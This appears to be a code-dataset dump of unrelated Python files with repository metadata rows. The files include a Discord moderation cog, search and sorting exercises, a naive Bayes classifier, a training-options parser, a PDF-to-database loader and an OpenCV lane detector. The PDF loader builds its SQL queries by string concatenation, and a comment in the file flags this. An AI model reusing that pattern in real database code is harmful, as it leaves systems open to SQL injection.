def main(path, fwlist, outfile='punct_results.txt'):
    """Run the attribution experiment on author subsets of increasing size.

    For the top-2/5/10/50 authors and the full corpus, run `fwa` and append
    a tab-separated accuracy row (slice label, baseline %, NB %, binary NB %)
    to ``outfile``.
    """
    authors, emails, all_texts = load_texts(path)
    top2, top5, top10, top50 = narrow_scope(authors, all_texts)
    corpus_slices = [top2, top5, top10, top50, all_texts]
    names = ["2", "5", "10", "50", "149"]
    for i in range(len(corpus_slices)):
        # renamed `bin` -> `bin_pct`: avoid shadowing the builtin bin()
        zr_pct, nb_pct, bin_pct = fwa(corpus_slices[i], fwlist)
        with open(outfile, 'a', encoding='utf-8') as out:
            out.write(f"{names[i]}\t{zr_pct}\t{nb_pct}\t{bin_pct}\n")
# CLI entry point: dataset path and feature-word list are overridable.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='feature vector homework')
    parser.add_argument('--path', type=str, default="all_emails_dbl_clean.tsv",
                        help='path to author dataset')
    parser.add_argument('--function_words_path', type=str, default="punct_list.txt",
                        help='path to the list of words to use as features')
    args = parser.parse_args()
    main(args.path, args.function_words_path)
| true |
78bdf4318d36c88193f5f831e4ba254301a5c184 | Python | JelNiSlaw/Menel | /Menel/cogs/moderation.py | UTF-8 | 5,373 | 2.53125 | 3 | [
"MIT"
] | permissive | import asyncio
from typing import Callable, Literal, Optional, Union
import discord
from discord.ext import commands
from ..bot import Menel
from ..utils.context import Context
from ..utils.converters import ClampedNumber
from ..utils.misc import chunk
from ..utils.text_tools import plural, plural_time
from ..utils.views import Confirm
class PurgeFilters(commands.FlagConverter, case_insensitive=True, prefix="--", delimiter=""):
    """Flag-style filters for the purge command (e.g. `--contains foo --type bots`)."""

    # only messages before / after these message snowflakes
    before: Optional[discord.Object]
    after: Optional[discord.Object]
    # substring the message content must contain (matched case-insensitively)
    contains: Optional[str]
    # restrict to messages authored by these users
    users: Optional[tuple[discord.User]] = commands.flag(aliases=["user"])
    # restrict to messages mentioning at least one of these users
    mentions: Optional[tuple[discord.User]]
    # restrict to one broad message category
    type: Optional[Literal["humans", "bots", "commands", "webhooks", "system"]]
def checks_from_filters(filters: PurgeFilters) -> list[Callable]:
    """Translate parsed purge flags into message predicates.

    A message passes only if every returned predicate is true for it;
    flags left as None contribute no predicate.
    """
    checks: list[Callable] = []
    if filters.contains is not None:
        needle = filters.contains.lower()
        checks.append(lambda msg: needle in msg.content.lower())
    if filters.users is not None:
        wanted_users = set(filters.users)
        checks.append(lambda msg: msg.author in wanted_users)
    if filters.mentions is not None:
        wanted_mentions = set(filters.mentions)
        checks.append(lambda msg: not wanted_mentions.isdisjoint(msg.mentions))
    if filters.type is not None:
        kind = filters.type
        if kind == "humans":
            checks.append(lambda msg: not msg.author.bot)
        elif kind == "bots":
            checks.append(lambda msg: msg.author.bot)
        elif kind == "commands":
            checks.append(lambda msg: msg.type is discord.MessageType.application_command)
        elif kind == "webhooks":
            checks.append(lambda msg: msg.webhook_id is not None)
        elif kind == "system":
            # "system" means anything that is not an ordinary / reply /
            # application-command message
            normal = {discord.MessageType.default, discord.MessageType.reply, discord.MessageType.application_command}
            checks.append(lambda msg: msg.type not in normal)
    return checks
class Moderation(commands.Cog):
    """Moderation commands: bulk message deletion, NSFW toggling and slowmode."""

    @commands.command(aliases=["clear", "clean"], ignore_extra=False)
    @commands.has_permissions(read_message_history=True, manage_messages=True)
    @commands.bot_has_permissions(read_message_history=True, manage_messages=True)
    @commands.cooldown(2, 5, commands.BucketType.user)
    @commands.max_concurrency(2, commands.BucketType.user)
    @commands.max_concurrency(1, commands.BucketType.channel, wait=True)
    async def purge(self, ctx: Context, limit: ClampedNumber(1, 1000), *, filters: PurgeFilters):
        """Delete up to `limit` messages matching all supplied filters, after a confirmation prompt."""
        async with ctx.typing():
            checks = checks_from_filters(filters)
            to_delete = []
            # scan up to 5x the requested limit so filtered-out messages
            # do not starve the search
            async for m in ctx.channel.history(
                limit=limit * 5, before=filters.before, after=filters.after, oldest_first=False
            ):
                if all(check(m) for check in checks):
                    to_delete.append(m)
                    if len(to_delete) > limit:
                        break
            if not to_delete:
                await ctx.error("Nie znaleziono żadnych wiadomości pasującej do filtrów")
                return
            # always remove the invoking command message as well
            if ctx.message not in to_delete:
                to_delete.insert(0, ctx.message)
            # keep at most `limit` matches plus the invoking message
            del to_delete[limit + 1 :]
        count_str = plural(len(to_delete) - 1, "wiadomość", "wiadomości", "wiadomości")
        view = Confirm(ctx.author)
        m = await ctx.embed(f"Na pewno chcesz usunąć {count_str}?", view=view)
        await view.wait()
        await m.delete()
        if view.result is not True:
            await ctx.embed("Anulowano usuwanie wiadomości", no_reply=True)
            return
        # bulk-delete in chunks of 100 (Discord API limit per call); pause
        # after full chunks to stay under the rate limit
        for messages in chunk(to_delete, 100):
            await ctx.channel.delete_messages(messages)
            if len(messages) >= 100:
                await asyncio.sleep(1)
        await ctx.embed(f"Usunięto {count_str}", no_reply=True, delete_after=5)

    @commands.command("toggle-nsfw", aliases=["mark_nsfw", "nsfw"])
    @commands.has_permissions(manage_channels=True)
    @commands.bot_has_permissions(manage_channels=True)
    @commands.cooldown(1, 3, commands.BucketType.channel)
    async def toggle_nsfw(self, ctx: Context, *, channel: discord.TextChannel = None):
        """Toggle the NSFW flag of the given channel (defaults to the current one)."""
        channel = channel or ctx.channel
        before = channel.nsfw
        await channel.edit(nsfw=not before)
        await ctx.embed(f"Oznaczono {channel.mention} jako {'SFW' if before else 'NSFW'}")

    @commands.command()
    @commands.has_permissions(manage_channels=True)
    @commands.bot_has_permissions(manage_channels=True)
    @commands.cooldown(2, 5, commands.BucketType.channel)
    async def slowmode(
        self,
        ctx: Context,
        channel: Optional[discord.TextChannel],
        *,
        time: Union[Literal[False], ClampedNumber(1, 21600)],
    ):
        """Set the channel's slowmode delay in seconds (`False` disables it)."""
        channel = channel or ctx.channel
        await channel.edit(slowmode_delay=time)
        if time is not False:
            await ctx.embed(f"Ustawiono czas slowmode na {channel.mention} na {plural_time(time)}")
        else:
            await ctx.embed(f"Wyłączono slowmode na {channel.mention}")
def setup(bot: Menel):
    # discord.py extension entry point: register this cog on the bot
    bot.add_cog(Moderation())
| true |
39d36d41fbb2ae1e11c54582278855c2cb1f6cb3 | Python | PikaKight/ICS4U-Classwork | /Coding_Practice/Algorithms/linear_searching.py | UTF-8 | 1,141 | 4.1875 | 4 | [] | no_license | """
Search a list of ints for a particular integer. Return the index location, -1 if not found.
Search a list of ints for the last occurrence of a particular integer. -1 if not found.
Search a list of ints for every occurrence of a particular integer. Return a list of every index number. Empty list of not found.
Search a list of strings for words that start with a substring. Return the first occurrence index.
Search a list of strings for words that start with a substring. Return list of all the strings (not the index positions).
"""
from typing import List
def int_search(target: int, numbers: List[int]) -> int:
    """Return the index of the first occurrence of ``target``, or -1 if absent.

    BUG FIX: compare with ``==`` instead of ``is`` — identity comparison
    only works for small interned ints in CPython and silently misses
    larger values.
    """
    for i, num in enumerate(numbers):
        if num == target:
            return i
    return -1
def int_occurrance_search(target:int, numbers: List[int]) -> int:
    """Return the index of the LAST occurrence of ``target``, or -1 if absent.

    BUG FIX: compares with ``==`` instead of ``is`` (identity only works for
    small interned ints). Also scans backwards over indices directly instead
    of building a reversed copy of the list.
    """
    for i in range(len(numbers) - 1, -1, -1):
        if numbers[i] == target:
            return i
    return -1
def list_occurrance(target:int, numbers: List[int]) -> List[int]:
    """Return the indices of every occurrence of ``target`` (empty list if none).

    BUG FIX: compares with ``==`` instead of ``is`` (identity only works for
    small interned ints in CPython).
    """
    return [i for i, num in enumerate(numbers) if num == target]
| true |
0003ac8a67d6893b9e1ae1fd388e8075c61e4806 | Python | eternaltc/test | /Test/Exception/except11.py | UTF-8 | 86 | 3.328125 | 3 | [] | no_license |
a = 10
# NOTE(review): deliberate infinite loop — this script never terminates and
# prints "1", the running total, and "2" forever.
while True:
    b = 3
    a = a + b
    print("1")
    print(a)
    print("2")
1f4edf1dd7ef356b8b79655dd89e81b1df5bf12a | Python | DequanZhu/FaceNet-and-FaceLoss-collections-tensorflow2.0 | /options/train_options.py | UTF-8 | 5,609 | 2.5625 | 3 | [] | no_license | import argparse
import os
import sys
import pandas as pd
class TrainOptions():
    """Command-line option parser for face-recognition training runs.

    Wraps argparse: `initialize` declares all flags, `parse` resolves them,
    derives per-loss/backbone checkpoint and log directories, prints the
    resolved options and (optionally) persists them to opt.txt.
    """
    def __init__(self,argv):
        # argv: raw argument list (typically sys.argv[1:])
        self.argv=argv
        self.parser = argparse.ArgumentParser()
        self.initialized = False
    def initialize(self):
        """Register every supported command-line argument on the parser."""
        # Common parameters for training the model
        self.parser.add_argument('--loss_type', type=str,
                                 choices=['OrignalSoftmax', 'L2Softmax','LSoftmax', 'AMSoftmax','ArcFaceSoftmax','CenterLoss','ASoftmax',],
                                 default='OrignalSoftmax',
                                 help='the margin is m in formula cos(theta-m) ')
        self.parser.add_argument('--backbone', type=str, default='Resnet50',
                                 help='The base network for extracting face features ')
        self.parser.add_argument('--restore', action='store_true',
                                 help='Whether to restart training from checkpoint ')
        self.parser.add_argument('--max_epoch', type=int, default=1,
                                 help='The max number of epochs to run')
        self.parser.add_argument('--nrof_classes', type=int, default=10000,
                                 help='The number of identities')
        self.parser.add_argument('--batch_size', type=int,
                                 default=32, help='The num of one batch samples')
        self.parser.add_argument('--image_size', type=int,
                                 default=160, help='The size of input face image')
        self.parser.add_argument('--embedding_size', type=int,
                                 default=128, help='The size of the extracted feature ')
        self.parser.add_argument('--checkpoint_dir', type=str, default='../checkpoint/',
                                 help='Directory where to save the checkpoints')
        self.parser.add_argument('--log_dir', type=str, default='../logs/',
                                 help='Directory where to save training log information ')
        self.parser.add_argument('--datasets', type=str, default='/home/zdq/vgg_tfrcd/',
                                 help='Directory where to load train and validate tfrecord format data')
        self.parser.add_argument('--learning_rate', type=float, default=2e-3,
                                 help='Initial learning rate. If set to a negative value a learning rate ')
        self.parser.add_argument('--eval-interval', type=int, default=1,
                                 help='evaluuation interval (default: 1)')
        self.parser.add_argument('--no-val', action='store_true', default=False,
                                 help='skip validation during training')
        # Parameters for LSoftmax, ArcFaceSoftmax, AMSoftmax
        self.parser.add_argument('--margin', type=float, default=0.3,
                                 help='The margin is m in ArcFaceSoftmax formula s*cos(theta-m) or in AMSoftmax formula s*(cos(theta)-m).')
        self.parser.add_argument('--feature_scale', type=float, default=1,
                                 help='The feature scales s in ArcFaceSoftmax formula s*cos(theta-m) or in AMSoftmax formula s*(cos(theta)-m) ')
        # Parameters for L2Softmax
        self.parser.add_argument('--l2_feature_scale', type=float, default=16.0,
                                 help='The feature length ')
        # Parameters for CenterLoss
        self.parser.add_argument('--alpha', type=float, default=0.95,
                                 help='Center update rate for center loss.')
        self.parser.add_argument('--loss_weight', type=float, default=0.5,
                                 help='Center loss factor.')
        # Parameters for ASoftmax
        self.parser.add_argument('--beta', type=int, default=1000,
                                 help='the beta in formula fyi=(beta*ori_softmax_loss+A_softmax)/(1+beta)')
        self.parser.add_argument('--decay', type=float, default=0.99,
                                 help='the decay ratio of beta')
        self.parser.add_argument('--beta_min', type=int, default=0,
                                 help='the min value of beta and after that is no longer to reduce')
        self.initialized = True
    def parse(self, save=True):
        """Parse self.argv, derive output dirs, print options; save opt.txt unless restoring."""
        if not self.initialized:
            self.initialize()
        opt=self.parser.parse_args(self.argv)
        # nest checkpoints/logs per loss type and backbone
        opt.checkpoint_dir=os.path.join(opt.checkpoint_dir, opt.loss_type, opt.backbone)
        if not os.path.exists(opt.checkpoint_dir):
            os.makedirs(opt.checkpoint_dir)
        opt.log_dir=os.path.join(opt.log_dir, opt.loss_type, opt.backbone)
        if not os.path.exists(opt.log_dir):
            os.makedirs(opt.log_dir)
        # NOTE(review): df is read but unused since the nrof_classes override
        # below is commented out — presumably info.csv holds the class count;
        # confirm before removing.
        df=pd.read_csv(os.path.join(opt.datasets,'info.csv'))
        # opt.nrof_classes = df['class_num'][0]
        args = vars(opt)
        print('------------ Options -------------')
        for k, v in sorted(args.items()):
            print('%s: %s' % (str(k), str(v)))
        print('-------------- End ----------------')
        # save to the disk
        if save and not opt.restore:
            file_name = os.path.join(opt.checkpoint_dir, 'opt.txt')
            with open(file_name, 'wt') as opt_file:
                opt_file.write('------------ Options -------------\n')
                for k, v in sorted(args.items()):
                    opt_file.write('%s: %s\n' % (str(k), str(v)))
                opt_file.write('-------------- End ----------------\n')
        return opt
if __name__=='__main__':
    # Smoke test: parse command-line options when run directly.
    opt=TrainOptions(sys.argv[1:]).parse()
    # print(opt)
223a0e5068ab237eacb7a6d5e9c82be25a87b31b | Python | EriKKo/adventofcode-2018 | /5/a.py | UTF-8 | 445 | 2.875 | 3 | [] | no_license | unit = map(ord, raw_input())
# Doubly linked list over the polymer units: next[i]/prev[i] hold the index
# of the neighbouring still-alive unit; -1 marks the ends of the chain.
next = [i + 1 for i in range(len(unit))]
next[-1] = -1
prev = [i - 1 for i in range(len(unit))]
alive = [True for c in unit]
p = 0
while next[p] >= 0:
    b = next[p]
    # Two adjacent units react when they are the same letter in opposite
    # case (their ASCII codes differ by exactly 32).
    if abs(unit[p] - unit[b]) == 32:
        alive[p] = alive[b] = False
        # Unlink both reacted units from the list.
        if prev[p] >= 0:
            next[prev[p]] = next[b]
        if next[b] >= 0:
            prev[next[b]] = prev[p]
        # Step back one unit so the newly adjacent pair gets re-checked.
        p = prev[p] if prev[p] >= 0 else next[b]
    else:
        p = b
# Number of surviving units after all reactions (Python 2 print statement).
print sum(alive)
| true |
47abbda8483957cb999d992a9403bbcc4ce56c7c | Python | gamesguru/hackerrank-interview-prep | /00_arrays/array-ds.py | UTF-8 | 295 | 3.328125 | 3 | [] | no_license | #!/bin/python3
# Complete the reverseArray function below.
def reverseArray(a):
    """Reverse the list in place and return the same list object."""
    a.reverse()
    return a
if __name__ == "__main__":
    # Quick manual check: expect [2, 4, 3, 1].
    arr = [1, 3, 4, 2]
    res = reverseArray(arr)
    print(res)
| true |
df508c1b4ee5b4ae98c1f9a0f00df5e9136469dd | Python | ranchunju147/jiaocai | /day2/tuple_type.py | UTF-8 | 127 | 3.25 | 3 | [] | no_license | #元组,只能被读取
# Tuples are immutable: elements can be read but never reassigned.
atuple = (1,2,3,4,5,6,7)
if __name__ == '__main__':
    # index access and slicing both work on tuples
    print(atuple[1])
    print(atuple[2:5])
| true |
96d8cd904ba3302280684487ad9f7d5e3f965611 | Python | moheed/algo | /lc953_verifyAlienDictSorted.py | UTF-8 | 1,272 | 3.25 | 3 | [
"MIT"
class Solution:
    def lexo(self, word1, word2, populate_order):
        """Return True iff word1 <= word2 under the alien alphabet.

        populate_order maps letter index (ord(c) - ord('a')) to its rank
        in the alien order. Debug prints from the original were removed.
        """
        shorter = min(len(word1), len(word2))
        for i in range(shorter):
            rank1 = populate_order[ord(word1[i]) - ord('a')]
            rank2 = populate_order[ord(word2[i]) - ord('a')]
            if rank1 < rank2:
                return True
            if rank1 > rank2:
                return False
        # All compared characters equal: word1 must not be the longer word
        # (a word precedes any word it is a proper prefix of).
        return len(word1) <= len(word2)

    def isAlienSorted(self, words: List[str], order: str) -> bool:
        """Return True iff ``words`` are sorted lexicographically by ``order``.

        https://leetcode.com/problems/verifying-an-alien-dictionary/
        """
        # rank table for the 26 lowercase letters
        populate_order = [0] * 26
        for rank, ch in enumerate(order):
            populate_order[ord(ch) - ord('a')] = rank
        # sorted iff every adjacent pair is in non-decreasing order
        return all(
            self.lexo(words[i], words[i + 1], populate_order)
            for i in range(len(words) - 1)
        )
| true |
e33be7c51e1a666e84c51c3597b001e351246d53 | Python | dfmartinez11/diego | /graficar.py | UTF-8 | 1,337 | 2.875 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from numpy import fft as f
# Load the ODE solver outputs produced by the C++ programs; each file has
# two columns (x, y). NOTE(review): paths are relative to the CWD — confirm
# the .dat files exist next to this script.
datos = np.loadtxt("datos.dat")
dato = np.loadtxt("difSencilla.dat")
datoss = np.loadtxt("difSencillaLeapF.dat")
x = datos.transpose()[0]
y = datos.transpose()[1]
a=plt.figure()
# Panel 1: original signal vs scaled/offset copy.
v1 = plt.subplot(3,2,1)
#plt.xlim(0,10)
v1.plot(x,y, color="r")
v1.plot(x,2*y +1, color ="g")
plt.legend(["original" , "aumentada"])
# Panel 2: signal with added uniform noise.
v2=plt.subplot(3,2,2)
#plt.xlim(0,15)
v2.plot(x,y+np.random.rand(len(y)), color ="b")
y = y + np.random.rand( len(y) )
# FFT of the noisy signal; frequencies above 0.0085 are zeroed (low-pass).
fo = f.fftshift(f.fft(y))
x = f.fftshift(f.fftfreq( len(y) ))
#y[abs(x) > 0.1] = 0
fo[abs(x) > 0.0085] = 0
# Panel 3: magnitude spectrum after filtering.
a1=plt.subplot(3,2,3)
a1.plot(x,abs(fo))
plt.legend(["fourier ODE"])
# Panel 4: inverse FFT of the filtered spectrum (denoised signal).
iy = f.ifft(fo)
a2 = plt.subplot(3,2,4)
a2.plot(x,iy, color="r")
#plt.xlim(0,0.1)
plt.legend(["inversa"])
# Panels 5-6: compare integrators (Runge-Kutta vs Euler vs leapfrog).
dato = np.loadtxt("difSencillaRunge.dat")
v3 = plt.subplot(3,2,5)
v3.plot(dato.transpose()[0],dato.transpose()[1], color="b")
v3.plot(datos.transpose()[0],datos.transpose()[1], color="r")
#plt.xlim(0,0.1)
plt.legend(["Runge","Euler"])
v4 = plt.subplot(3,2,6)
v4.plot(dato.transpose()[0],dato.transpose()[1], color="b")
v4.plot(datoss.transpose()[0],datoss.transpose()[1], color="g")
#plt.xlim(0,0.1)
plt.legend(["Runge","LeapF"])
# Save the six-panel figure to disk.
a.savefig("graficaCPP.png")
| true |
2bf792e2b68953a11d60a740e519047d5e1ba986 | Python | warlockee/leetpy | /algos/merge-sorted-array.py | UTF-8 | 829 | 3.59375 | 4 | [] | no_license | # https://leetcode.com/problems/merge-sorted-array/
class Solution(object):
    def merge(self, nums1, m, nums2, n):
        """Merge nums2 (length n) into nums1 (m values followed by n empty
        slots), in place, keeping ascending order.

        Fills nums1 from the back so no unread element is overwritten.
        """
        write = m + n - 1   # next slot to fill in nums1
        a, b = m - 1, n - 1  # cursors over the tails of nums1 / nums2
        while a >= 0 and b >= 0:
            if nums1[a] > nums2[b]:
                nums1[write] = nums1[a]
                a -= 1
            else:
                nums1[write] = nums2[b]
                b -= 1
            write -= 1
        # Whatever remains of nums2 is smaller than everything already
        # placed; nums1's own remainder is already in position.
        nums1[:b + 1] = nums2[:b + 1]
| true |
97fae16d0869e669d4bac411b383cbabcd7d0736 | Python | surajduncan/ml_programs | /naive_bayesian_bulitin.py | UTF-8 | 1,684 | 3.53125 | 4 | [] | no_license | # Assuming a set of documents that need to be classified, use the naïve Bayesian Classifier model to perform this task.
# Built-in Java classes/API can be used to write the program.
# Calculate the accuracy, precision, and recall for your data set.
# naive bayesian classifier
import pandas as pd
# Load the labelled corpus: column 0 = message text, column 1 = pos/neg label.
msg=pd.read_csv('naivebuiltin.csv',header=None,names=['message','label'],)
print('The dimensions of the dataset',msg.shape)
# Map string labels to numeric targets (pos -> 1, neg -> 0).
msg['labelnum']=msg.label.map({'pos':1,'neg':0})
X=msg.message
y=msg.labelnum
# Fixed random_state makes the train/test split reproducible.
from sklearn.model_selection import train_test_split
xtrain,xtest,ytrain,ytest=train_test_split(X,y,random_state=1)
print('dimensions of train and test sets')
print(xtrain.shape)
print(xtest.shape)
print(ytrain.shape)
print(ytest.shape)
#output of count vectoriser is a sparse matrix
# Bag-of-words features: fit the vocabulary on the training set only.
from sklearn.feature_extraction.text import CountVectorizer
count_vect = CountVectorizer()
xtrain_dtm = count_vect.fit_transform(xtrain)
xtest_dtm=count_vect.transform(xtest)
# Training Naive Bayes (NB) classifier on training data.
from sklearn.naive_bayes import MultinomialNB
clf = MultinomialNB().fit(xtrain_dtm,ytrain)
predicted = clf.predict(xtest_dtm)
print('\nclassification results of testing samples are given below')
for doc,p in zip(xtest,predicted):
    pred='pos' if p==1 else 'neg'
    print('%s->%s' %(doc,pred))
#printing accuracy metrics
from sklearn import metrics
print('Accuracy metrics')
print('Accuracy of the classifer is',metrics.accuracy_score(ytest,predicted))
print('Confusion matrix')
print(metrics.confusion_matrix(ytest,predicted))
print('Recall and Precison ')
print(metrics.recall_score(ytest,predicted))
print(metrics.precision_score(ytest,predicted))
| true |
843501fcf83e3fd56343afe1740c9e035e733ff8 | Python | AleTavares/colheitaSoja | /processaPDFHistorico.py | UTF-8 | 3,326 | 2.75 | 3 | [] | no_license | from PyPDF2 import PdfFileReader
import pandas as pd
from tabula import read_pdf
import re
import os
import bancoDados as bd
# Função para limpar sujeira coluna Nordeste
def limpaValores(strLimpar):
    """Clean garbled values from the 'Nordeste' column.

    Values containing '/' were mangled during PDF extraction; rebuild them as
    '<two digits>.<fraction digits>' where the two digits come from fixed
    positions of the part before the slash and the fraction is every digit of
    the part after it. Anything without a '/' is returned untouched.
    """
    if "/" not in strLimpar:
        return strLimpar
    parts = strLimpar.split('/')
    head = parts[0]
    # digits at the 3rd-from-last and last positions of the first part
    integer_part = head[len(head) - 3] + head[-1]
    # strip every non-digit from the second part
    fraction_part = re.sub(r"\D", "", parts[1])
    return integer_part + '.' + fraction_part
# Função para ajustar as datas
def ajustaData(strData):
mes = {
'jan': '1',
'fev': '2',
'mar': '3',
'abr': '4',
'jun': '6',
'jul': '7',
'ago': '8',
'set': '9',
'out': '10',
'nov': '11',
'dez': '12'
}
arrData = strData.split('-')
dataAjustada = '20'+arrData[2] + '-' + mes[arrData[1]] + '-' + arrData[0]
return dataAjustada
# Função para processar arquivos PDF
# Process the IMEA harvest-history PDF and load new rows into the database.
def processaPDF():
    """Extract the soy-harvest table from the PDF, clean it, unpivot it and
    insert rows that are not yet present into soja.producaoSoja."""
    # Read the PDF with the harvest history (first extracted table).
    tabelaComum = read_pdf('colheita18_19.pdf')
    # Turn the extracted PDF table into a DataFrame.
    dfSoja = pd.DataFrame(tabelaComum[0])
    # Drop rows containing extraction garbage / missing values.
    dfSoja = dfSoja.dropna()
    # Strip '%' and swap the decimal comma for a dot in every column.
    for coluna in dfSoja.columns:
        dfSoja[coluna] = dfSoja[coluna].apply(lambda x : str(x).replace("%", ""))
        dfSoja[coluna] = dfSoja[coluna].apply(lambda x : str(x).replace(",", "."))
    # Split the two columns that came out of the PDF merged together.
    new = dfSoja["Norte Oeste"].str.split(" ", n = 1, expand = True)
    dfSoja['Norte'] = new[0]
    dfSoja['Oeste'] = new[1]
    dfSoja.pop('Norte Oeste')
    # Drop the last two garbage rows, then the leading header row.
    dfSoja = dfSoja.apply(lambda x: x.head(-2)).reset_index(0, drop=True)
    dfSoja = dfSoja.iloc[1:]
    # Normalise the date column to '20yy-m-dd'.
    dfSoja['Regiões do IMEA'] = dfSoja['Regiões do IMEA'].apply(ajustaData)
    # Clean the garbled values in the 'Norte' column.
    dfSoja['Norte'] = dfSoja['Norte'].map(limpaValores)
    # Unpivot to long format: (data, regioesIMEA, percentual) rows.
    df_unpivoted = dfSoja.melt(id_vars=['Regiões do IMEA', ], var_name='regioesIMEA', value_name='percentual')
    df_unpivoted.columns = ['data', 'regioesIMEA', 'percentual']
    # Insert only rows that are not yet in the database.
    # NOTE(review): the SQL below is built by string concatenation — safe only
    # because values come from the parsed PDF, but parameterised queries
    # would be the robust fix.
    sql = "insert into soja.producaoSoja(\
    datacotacao, \
    regioesimea, \
    percentual\
    ) values"
    conectaInsert = ''
    executa = False
    for index, row in df_unpivoted.iterrows():
        # Skip rows whose (date, region) pair already exists.
        bd.cur.execute("select datacotacao\
            from soja.producaosoja \
            where datacotacao = '" + row['data'] + "' \
            and regioesimea = '" + row['regioesIMEA'] + "'")
        recset = bd.cur.fetchall()
        if len(recset) <= 0:
            sql = sql + conectaInsert + "(\
            '" + row['data'] +"',\
            '" + row['regioesIMEA'] +"',\
            " + row['percentual'] +"\
            )"
            executa = True
            conectaInsert = ', '
    # Run the accumulated multi-row insert only if something is new.
    if executa:
        bd.cur.execute(sql)
        bd.con.commit()
    bd.con.close()
    print(df_unpivoted)
# Runs immediately on import/execution of this module.
processaPDF()
| true |
3f0dce30a3a36a55fecd21764b79f3ddc60a9701 | Python | Artemy2807/line-detect-py | /road.py | UTF-8 | 19,188 | 2.921875 | 3 | [] | no_license | import cv2 as cv
import numpy as np
import time
# Open the recorded road video; abort if it cannot be read.
vid = cv.VideoCapture("roadgazebo.avi")
if vid.isOpened() == False:
    print("Cannot open input video")
    exit()
# Target (height, width) in px for the downscaled working frame — half the
# original size, to speed up the later processing (binarisation etc.).
imgRoadMin = [210, 320]
# Region of interest around the lane markings: (x, y) points measured from
# the top-left corner, listed clockwise starting at the bottom-left.
# float32 is required by cv.getPerspectiveTransform.
roi = np.float32([[10, 200],
[300, 200],
[230, 140],
[85, 140]])
# [20, 200]  bottom-left point
# [310, 200] bottom-right point
# [225, 120] top-right point
# [100, 120] top-left point
# Integer copy of the ROI for drawing (cv.polylines needs int32);
# first argument is the array to copy, second the target dtype.
roi_draw = np.array(roi, dtype=np.int32)
# Destination corners for the perspective warp — the full downscaled frame,
# clockwise from the bottom-left corner.
dst = np.float32([[0, imgRoadMin[0]],
[imgRoadMin[1], imgRoadMin[0]],
[imgRoadMin[1], 0],
[0, 0]])
key = 0
while (cv.waitKey(40) != 27): #если нужно переключение кадров сделать по клавише, в скобках cv.waitKey() пусто, а 40 это 40 мс между кадрами то есть фпс 25
# // waitKey
# возвращает - 1, если ничего не нажать
# // если нажали клавишу, эта функция возвращает код ключа ASCII
# // if (waitKey() == 27) в таком случае будем ждать нажатия клавыши esc (код 27) для выхода
# // и если оставим пустым аргумент waitKey, то кадр будет обновляться с нажатием любой клавиши
# // Число 40 получается по нехитрой формуле:
# // 1000 миллисекунд / 25 кадров в секунду = 40 миллисекунд
# // чаще обращаться смысла нет, если камера не поддерживает большее fps
ret, frame = vid.read()
if ret == False:
print("End of video")
#cap.release()
#cap = cv.VideoCapture(r"test_videos/output1280.avi")
#ret, frame = cap.read()
#break
resized = cv.resize(frame, (imgRoadMin[1], imgRoadMin[0])) #уменьшаем исходный кадр до заданых размеров для более быстрой работы обработки изображения (в частности бинаризации)
cv.imshow("frame", resized)
r_channel = resized[:, :, 2]
binary = np.zeros_like(r_channel)
binary[(r_channel > 200)] = 1
#cv.imshow("r_channel",binary)
#альтернативная бинаризация по красной компоненте
# hls=cv.cvtColor(resized, cv.COLOR_BGR2HLS)
# s_channel = resized[:, :, 2]
# binary2 = np.zeros_like(s_channel)
# binary2[(r_channel > 160)] = 1
#
# allBinary = np.zeros_like(binary)
# allBinary[((binary == 1)|(binary2 == 1))] = 255
#более короткая бинаризация изображения через treshold с предварительным переводом изображения в одноканальное
resized = cv.cvtColor(resized, cv.COLOR_RGB2GRAY)
ret, allBinary = cv.threshold(resized, 150, 255, cv.THRESH_BINARY) #для игнорирования флага наличия изображения (_, allBinary)
#print(allBinary.shape[-1]) #вывод каналов изображения
#cv.imshow("binary", allBinary)
allBinary_visual = allBinary.copy() #предварительно копируем из основного изображения в новое, чтобы не испортить исходное
cv.polylines(allBinary_visual, [roi_draw], True, 255) #соеднияем точки массива [roi_draw] одной линией белой линией для одноканального изображения 255
cv.imshow("roi", allBinary_visual)
#расчет матрицы преобразований, где первый аргумент это массив с координатами области интрерса, то есть наша трапеция
#а второй аргумент как раз координаты углов ужатого изображения
M = cv.getPerspectiveTransform(roi, dst) #на выходе матрица M для получения прямоугольного изображения
#https://youtu.be/ApUQ0EgrnM0
#https://learnopencv.com/feature-based-image-alignment-using-opencv-c-python/
#https://www.geeksforgeeks.org/perspective-transformation-python-opencv/
# allBinary - изображение, которое хотим преобразовать, M - матрица преобразования, далее размер изображения (как и входное),
#flags=cv.INTER_LINEAR - способ расчета
# imgIntpl преобразование изображение из трапецевидного в обычное квадратное
imgIntpl = cv.warpPerspective(allBinary, M, (imgRoadMin[1], imgRoadMin[0]), flags=cv.INTER_LINEAR)
#cv.imshow("imgIntpl", imgIntpl)
#поиск самых белых столбцов на преобразованном из трапеции в прямоугольник изображении
#укороченный вариант для суммирования, где axis=0 это вертикаль и в histogram мы получим сумму белых элементов в каждом столбце
#суммирование пикселей происходит от низа картинки до середины imgIntpl.shape[0]//2
histogram = np.sum(imgIntpl[imgIntpl.shape[0] // 2:, :], axis=0)
#поиск начинается с середины по вертикали и смотрим слева и справа
midpoint = histogram.shape[0]//2 #номер центрального столбца, берем целое число обазательно, поэтому //, а не /
idLeft = np.argmax(histogram[:midpoint])
idRight = np.argmax(histogram[midpoint:]) + midpoint
#альтернатиным более долгим вариантом: просуммируем все белые пиксели в каждом стобце через for
#shape[0] - строка картинки shape[1] столбец картинки
#находим номер пикселя по X самого белого столбца в левой части области интереса и в правой области интереса
# indexMas = 0
# whitePix = 0
# idLeft = 0
# idRight = 0
# maxWhitePix = 0
# arrayWhitePixel = []
# for i in range(0, imgIntpl.shape[1]): # по правой части кадра
# indexMas = indexMas + 1
# whitePix = 0
# if (i == imgIntpl.shape[1] // 2):
# maxWhitePix = 0
# for j in range(imgIntpl.shape[0] // 2, imgIntpl.shape[0]):
# if (imgIntpl[j, i] > 100):
# whitePix = whitePix + 1
# if (whitePix > maxWhitePix):
# if (i < imgIntpl.shape[1] // 2): # левая часть
# idLeft = i
# else:
# idRight = i
# maxWhitePix = whitePix
imgIntpl_visual = imgIntpl.copy() #рисовть серые линии будем на копии изображении для демонстрации чтобы не испортить оригинал
cv.line(imgIntpl_visual, (idLeft, imgIntpl_visual.shape[0]//2), (idLeft, imgIntpl_visual.shape[0]), 122, 3)
cv.line(imgIntpl_visual, (idRight, imgIntpl_visual.shape[0]//2), (idRight, imgIntpl_visual.shape[0]), 122, 3)
